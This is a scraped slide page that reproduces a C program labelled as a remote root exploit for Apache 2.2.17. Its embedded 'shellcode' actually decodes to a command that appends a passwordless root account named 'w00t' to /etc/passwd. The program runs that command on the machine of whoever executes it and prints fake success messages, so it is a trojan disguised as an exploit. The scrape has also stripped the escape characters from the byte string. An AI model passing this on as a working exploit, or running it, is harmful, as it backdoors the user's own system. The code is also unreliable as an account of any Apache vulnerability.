More Related Content Similar to Yg byev2e (20) Yg byev2e1. /* apachesm4sh.c apache 2.2.17 remote root exploit*/
/* KEEP PRIV8&!&! leak and i will find you :) ~ desg */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
char evil[] =
"xebx2ax5ex31xc0x88x46x07x88x46x0ax88x46x47x89"
"x76x49x8dx5ex08x89x5ex4dx8dx5ex0bx89x5ex51x89"
"x46x55xb0x0bx89xf3x8dx4ex49x8dx56x55xcdx80xe8"
"xd1xffxffxffx2fx62x69x6ex2fx73x68x23x2dx63x23"
"x2fx62x69x6ex2fx65x63x68x6fx20x77x30x30x30x74"
"x3ax3ax30x3ax30x3ax73x34x66x65x6dx30x64x65x3a"
"x2fx72x6fx6fx74x3ax2fx62x69x6ex2fx62x61x73x68"
"x20x3ex3ex20x2fx65x74x63x2fx70x61x73x73x77x64"
"x23x41x41x41x41x42x42x42x42x43x43x43x43x44x44"
"x44x44";
#define NOP 0x90
#define BSIZE 1000
#define OFFSET 400
#define ADDR 0xbffff658
#define ASIZE 2000
int
main(int argc, char *argv[])
{
char *buffer;
int s;
struct hostent *hp;
struct sockaddr_in sin;
if (argc != 2) {
printf("%s <target>n", argv[0]);
exit(1);
}
buffer = (char *) malloc(BSIZE + ASIZE + 100);
if (buffer == NULL) {
printf("Not enough memoryn");
exit(1);
}
memcpy(&buffer[BSIZE - strlen(evil)], evil,
strlen(evil));
buffer[BSIZE + ASIZE] = ';';
buffer[BSIZE + ASIZE + 1] = '0';
hp = gethostbyname(argv[1]);
if (hp == NULL) {
printf("no such servern");
exit(1);
}
bzero(&sin, sizeof(sin));
bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
sin.sin_family = AF_INET;
sin.sin_port = htons(80);
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s < 0) {
printf("Can't open socketn");
2. exit(1);
}
if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
printf("Connection refusedn");
exit(1);
}
printf("sending exploit code...n");
if (send(s, buffer, strlen(buffer), 0) != 1)
printf("exploit was successful!n");
else
printf("sorry, this site isn't vulnerablen");
printf("waiting for shell.....n");
if (fork() == 0)
execl("/bin/sh", "sh", "-c", evil, 0);
else
wait(NULL);
while (1) { /* shell */ }
}